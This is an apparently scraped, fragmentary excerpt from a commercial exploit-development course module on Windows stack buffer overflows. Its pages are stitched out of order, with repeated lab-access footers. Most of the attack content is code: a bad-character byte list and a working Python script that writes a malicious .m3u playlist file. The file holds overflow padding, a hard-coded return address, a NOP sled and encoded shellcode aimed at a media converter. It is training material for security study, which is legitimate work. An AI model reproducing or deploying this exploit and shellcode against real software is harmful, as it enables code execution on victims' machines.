Professional Documents
Culture Documents
S e c t i o n 0 2 | M o d u l e 0 1
© Caendra Inc. 2019
All Rights Reserved
Table of Contents
Windows Stack
Overflow
Windows Basic
Overflow Analysis
Now, let’s run the python script. The “exploit.m3u” file will
appear.
Drag and drop the newly created exploit m3u file onto the
converter and check in the debugger what happens.
Unfortunately, no.
process_user_data(){
tmp = user_input
sanitized_input = sanitize(tmp) //remove all non-printable characters
strcpy(application_memory, sanitized_input)
}
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
Let’s restore 0x09 and remove CRLF, the 0x0a and 0x0d
bytes from the ASCII buffer. Then, we’ll generate a new file,
restart the application, reattach the debugger, and run the
exploit file.
XDSv1: Section 2, Module 1 - Caendra Inc. © 2019 | p.62
1.2.4.2 Basic Overflow – Common Bad Characters
buffer = "http://"
shellcode = ("\xda\xd7\xbd\x3e\x3b\xf9\x36\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x31\x31\x68\x18\x03\x68\x18\x83\xc0\x3a\xd9\x0c\xca\xaa\x9f"
"\xef\x33\x2a\xc0\x66\xd6\x1b\xc0\x1d\x92\x0b\xf0\x56\xf6\xa7"
"\x7b\x3a\xe3\x3c\x09\x93\x04\xf5\xa4\xc5\x2b\x06\x94\x36\x2d"
"\x84\xe7\x6a\x8d\xb5\x27\x7f\xcc\xf2\x5a\x72\x9c\xab\x11\x21"
"\x31\xd8\x6c\xfa\xba\x92\x61\x7a\x5e\x62\x83\xab\xf1\xf9\xda"
"\x6b\xf3\x2e\x57\x22\xeb\x33\x52\xfc\x80\x87\x28\xff\x40\xd6"
"\xd1\xac\xac\xd7\x23\xac\xe9\xdf\xdb\xdb\x03\x1c\x61\xdc\xd7"
"\x5f\xbd\x69\xcc\xc7\x36\xc9\x28\xf6\x9b\x8c\xbb\xf4\x50\xda"
"\xe4\x18\x66\x0f\x9f\x24\xe3\xae\x70\xad\xb7\x94\x54\xf6\x6c"
"\xb4\xcd\x52\xc2\xc9\x0e\x3d\xbb\x6f\x44\xd3\xa8\x1d\x07\xb9"
"\x2f\x93\x3d\x8f\x30\xab\x3d\xbf\x58\x9a\xb6\x50\x1e\x23\x1d"
"\x15\xd0\x69\x3c\x3f\x79\x34\xd4\x02\xe4\xc7\x02\x40\x11\x44"
"\xa7\x38\xe6\x54\xc2\x3d\xa2\xd2\x3e\x4f\xbb\xb6\x40\xfc\xbc"
"\x92\x22\x63\x2f\x7e\x8b\x06\xd7\xe5\xd3")
buffer += "A"*17417
buffer += "\x6e\x9d\x92\x55"
buffer += "\x90"*50
buffer += shellcode
buffer += "C"*(600-len(shellcode))
f = open("exploit.m3u", "w")
f.write(buffer)
f.close()
*Labs are only available in Full or Elite Editions of the course. To access, go to the course in your members area and
click the labs drop-down in the appropriate module line or to the virtual labs tabs on the left navigation. To
upgrade, click LINK.
XDSv1: Section 2, Module 1 - Caendra Inc. © 2019 | p.69
References
*Labs are only available in Full or Elite Editions of the course. To access, go to the course in your members area and click the labs drop-down
in the appropriate module line or to the virtual labs tabs on the left navigation. To upgrade, click LINK.